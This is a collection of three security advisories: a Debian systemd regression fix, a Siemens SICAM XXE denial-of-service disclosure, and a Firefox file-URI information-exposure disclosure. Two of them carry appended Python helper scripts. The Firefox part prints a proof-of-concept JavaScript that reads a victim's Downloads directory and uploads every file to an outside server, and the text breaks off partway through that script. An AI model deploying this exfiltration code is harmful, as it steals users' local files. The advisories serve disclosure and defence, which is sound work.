[SECURITY] [DSA 4367-2] systemd regression update
-------------------------------------------------------------------------
Debian Security Advisory DSA-4367-2                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
January 15, 2019                      https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : systemd

The Qualys Research Labs reported that the backported security fixes
shipped in DSA 4367-1 contained a memory leak in systemd-journald. This
and an unrelated bug in systemd-coredump are corrected in this update.

Note that as the systemd-journald service is not restarted automatically
a restart of the service or more safely a reboot is advised.

For the stable distribution (stretch), these problems have been fixed in
version 232-25+deb9u8.

We recommend that you upgrade your systemd packages.

For the detailed security status of systemd please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/systemd

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
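As an added example (not part of the DSA or of Debian's tooling), the following Python script checks whether a running systemd-journald still predates the updated binary, which is the situation the note above warns about. The binary path /lib/systemd/systemd-journald and the comm name systemd-journal are assumptions about the stretch package, and the check is Linux-only because it reads /proc.

```python
"""Report daemons that were started before their binary was last updated."""
import os


def process_start_epoch(pid):
    """Unix time at which `pid` started, derived from /proc (Linux only)."""
    with open("/proc/stat") as f:
        btime = next(int(line.split()[1]) for line in f if line.startswith("btime"))
    with open(f"/proc/{pid}/stat") as f:
        stat = f.read()
    # Field 22 is the start time in clock ticks since boot. Split after the
    # parenthesised comm field so a space in the process name cannot shift it.
    fields = stat[stat.rindex(")") + 2:].split()
    start_ticks = int(fields[19])
    return btime + start_ticks // os.sysconf("SC_CLK_TCK")


def started_before_file_changed(pid, path):
    """True if the process predates the last modification of `path`, i.e. it is
    still executing the code that was on disk before the package update."""
    return process_start_epoch(pid) < int(os.stat(path).st_mtime)


def find_pids_by_comm(comm):
    """PIDs whose /proc/<pid>/comm equals `comm` (the kernel truncates comm to 15 chars)."""
    pids = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                if f.read().strip() == comm:
                    pids.append(int(entry))
        except OSError:  # process exited or is not readable
            pass
    return pids


if __name__ == "__main__":
    # Assumed path of the journald binary in stretch's systemd package (not stated in the DSA).
    binary = "/lib/systemd/systemd-journald"
    for pid in find_pids_by_comm("systemd-journal"):
        stale = started_before_file_changed(pid, binary)
        print(f"systemd-journald pid {pid}: {'restart needed' if stale else 'up to date'}")
```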
CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS
# # # COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
# # #
#
# Product:  SICAM A8000 Series
# Vendor:   Siemens
# CSNC ID:  CSNC-2019-002
# CVE ID:   CVE-2018-13798
# Subject:  SICAM Webinterface XXE DoS
# Risk:     Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect:   Unauthenticated remotely exploitable
# Authors:  Emanuel Duss
#           Nicolas Heiniger
# Date:     2019-01-14
#
# # #

Introduction
------------

The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular
device range for telecontrol and automation applications in all areas of
energy supply. The device offers a web management interface for performing
simple management tasks.

During a penetration test, Compass found a denial-of-service vulnerability
in the Siemens SICAM web server. The web management interface is vulnerable
to the XXE billion laughs attack [2] using XML entities. Successful
exploitation can be performed unauthenticated over the network.

Affected
--------

* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
---------------------

When a login on the web management interface is performed, the following
request is sent to the server:

    POST /sicweb-ajax/auth HTTP/1.1
    Host: 10.5.23.42
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://10.5.23.42
    Content-Type: application/xml
    Content-Length: 118
    Connection: close

By modifying the XML message, it's possible to perform a billion laughs
denial-of-service attack against the web management interface:

    POST /sicweb-ajax/auth HTTP/1.1
    Host: 10.5.23.42
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://10.5.23.42/
    Content-Type: application/xml
    Content-Length: 1679
    Connection: close

    ]>

The XML parser on the device tries to resolve the external entities. This
consumes all available memory, and the web management interface no longer
responds. If the web management interface is refreshed in the browser, the
following message appears:

    The device is currently unreachable. Retrying to connect.

Other services on the device, like the one used by the ToolboxII for
configuring the device or the IEC104 service, still work properly and are
not affected by this attack. Only the web management interface remains
unusable until the device is rebooted.

It's not possible to use XXE to read local or remote files using the SYSTEM
directive.

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
-----------

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, it's also possible to restrict access to the web server on
port 80/tcp and 443/tcp using a firewall.

Acknowledgments
---------------

We thank Siemens for the coordinated disclosure.

Timeline
--------

2018-05-28: Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28: Informed customer
2018-06-06: Initial vendor notification
2018-03-18: Vendor informed us that they will publish an advisory
2019-01-08: Siemens published advisory [3]
2019-01-11: Compass published advisory containing technical information

References
----------

[1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt
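Added example, not from the Compass advisory or from Siemens: a parser that refuses any entity declaration before expansion can begin, which is the cheapest server-side defence against the billion laughs payload described above, set beside a default parser to show the amplification. Both XML documents are constructed samples; the element names are assumed and do not reproduce the device's actual login message.

```python
"""Refuse XML entity declarations before an XML parser can expand them."""
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Constructed, deliberately small billion-laughs document of the kind the
# advisory describes: three levels with ten references each (10**3 expansions).
BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE auth [
 <!ENTITY a "aaaaaaaaaa">
 <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
 <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<auth>&c;</auth>"""

# Constructed benign login message with the same (assumed) root element.
BENIGN = b'<?xml version="1.0"?><auth><user>joe</user><pass>x</pass></auth>'


class EntityDeclarationRejected(ValueError):
    """Raised as soon as the document declares any entity, internal or external."""


def _reject_entity(entity_name, *_):
    # expat calls this at the declaration, before the entity is ever referenced.
    raise EntityDeclarationRejected(f"entity declaration {entity_name!r} refused")


def safe_element_names(xml_bytes):
    """Parse with expat but abort on the first entity declaration.

    Returns the element names in document order for an entity-free document and
    raises EntityDeclarationRejected otherwise, before any expansion happens.
    """
    names = []
    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = _reject_entity
    parser.ExternalEntityRefHandler = lambda *_: 0  # a false return aborts the parse
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names


def naive_expanded_length(xml_bytes):
    """Length of the root's text after a default parser expands the entities:
    the amplification a parser without entity limits is exposed to."""
    return len(ET.fromstring(xml_bytes).text or "")
```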
[SYSS-2018-041] Mozilla Firefox - Information Exposure
Advisory ID: SYSS-2018-041
Product: Firefox
Manufacturer: Mozilla
Affected Versions: <= 64
Tested Versions: 61, 62, 63, 64
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2018-07-19
Solution Date: -
Public Disclosure: 2019-01-16
CVE Reference: Not yet assigned
Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Mozilla Firefox is a web browser available for various platforms including
Windows, Linux, Mac, Android, and iOS [1]. It is one of the most popular
web browsers according to StatCounter [2].

An overly liberal same-origin policy for file URIs and a bug in the
implementation of this policy make Firefox vulnerable to exposure of local
files to a remote attacker.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Firefox's same-origin policy for file URIs allows local files to read other
files in the same directory but not the directory index [3]. For example, a
file with the URI file:///home/joe/Dowloads/aFile.html can read
file:///home/joe/Dowloads/anotherFile.html, but it should not be able to
read file:///home/joe/Dowloads/.

We discovered, however, a violation of this policy in the special case when
a user first opens a local directory, e.g., file:///home/joe/Dowloads/, in
the browser and from there navigates to a file in this directory, e.g.,
file:///home/joe/Dowloads/aFile.html. In this case, aFile.html can read the
Downloads directory index. This allows a malicious script in aFile.html to
read all files in this directory by referring to each of them by its
respective filename, and to send all the data to a remote server controlled
by the attacker.

The following attack scenario seems plausible. A user saves an HTML file in
the Downloads folder. The victim might have received the file by email;
downloaded it from a malicious website offering, e.g., free eBooks or
picture albums; or downloaded it from a corporate website where a malicious
employee had uploaded it. The victim clicks on the filename in the file
manager. The file is opened with the default Firefox browser. The victim is
presented with a directory index and a message explaining that the file is
"protected" and that the user should open it in "safe mode" by clicking on
the link in the directory index. The victim clicks again on the filename,
this time in the browser's directory listing. The contents of the HTML
document are displayed. In the background, the malicious JavaScript reads,
first, the directory index, then the contents of each file in the Downloads
directory, and sends all of this data to a website controlled by the
attacker.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

We offer a test website [5] where a user can check whether a browser is
vulnerable to evilXHR. The above scenario is implemented by the following
HTML file evilXHR.html:

    <title>evilXHR</title>
    <script src="https://ptvb.sy.gs/evilXHR/base64ArrayBuffer.js"></script>
    <script>
    // The script will be called from this HTML file:
    var htmlName = 'evilXHR.html';
    // Files will be uploaded to this site:
    var siteURL = 'https://ptvb.sy.gs/evilXHR/';
    var phpURL = siteURL + 'upload.php';
    var cType = 'application/x-www-form-urlencoded';
    var guID = Date.now() + Math.random().toString().substr(3,8);
    var uploadPathURL = siteURL + 'Uploads/' + guID;
    //---
    function singleFileEvilXHR(fName) {
        var xGetFile = new XMLHttpRequest();
        xGetFile.onreadystatechange = function() {
            if (this.readyState == 4) {
                var xPostFile = new XMLHttpRequest();
                xPostFile.open('POST', phpURL);
                var fURL = encodeURIComponent(this.responseURL);
                var fData = encodeURIComponent(base64ArrayBuffer(this.response));
                xPostFile.setRequestHeader('Content-Type', cType);
                xPostFile.send('guID='+guID + '&fURL='+fURL + '&fData='+fData);
            }
        }
        xGetFile.open('GET', fName);
        xGetFile.responseType = 'arraybuffer';
        xGetFile.send();
    }
    //---
    function allFilesEvilXHR() {
        var xGetDir = new XMLHttpRequest();
        xGetDir.onreadystatechange = function() {
            if (this.readyState == 4) {
                var xPostDir = new XMLHttpRequest();
                xPostDir.open('POST', phpURL);
                var dData = encodeURIComponent(this.response);
                xPostDir.setRequestHeader('Content-Type', cType);
                xPostDir.send('guID=' + guID + '&dData=' + dData);
                var dirIndex = this.response.split('\n');
                for (var n = 2; n < dirIndex.length-1; n++) {
                    var dirIndexEntry = dirIndex[n].split(' ');
                    if (dirIndexEntry[4] == 'FILE' && dirIndexEntry[1] != htmlName) {
                        singleFileEvilXHR(dirIndexEntry[1]);
                    }
                }
            }
        }